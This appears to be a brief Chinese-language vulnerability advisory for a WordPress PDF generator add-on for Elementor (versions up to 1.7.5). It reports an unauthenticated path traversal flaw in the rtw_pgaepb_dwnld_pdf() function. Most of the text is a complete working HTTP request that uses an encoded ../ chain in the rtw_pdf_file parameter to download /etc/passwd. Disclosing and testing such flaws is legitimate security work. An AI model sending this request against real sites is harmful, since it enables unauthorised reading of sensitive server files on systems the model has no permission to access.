Elementor Page Builder 的 PDF 生成器插件 <= 1.7.5 - 未经认证的任意文件下载
WordPress 的 Elementor Page Builder 插件的 PDF 生成器附加组件在所有版本(包括 1.7.5)中,通过 rtw_pgaepb_dwnld_pdf() 函数存在路径遍历漏洞。这使得未经认证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i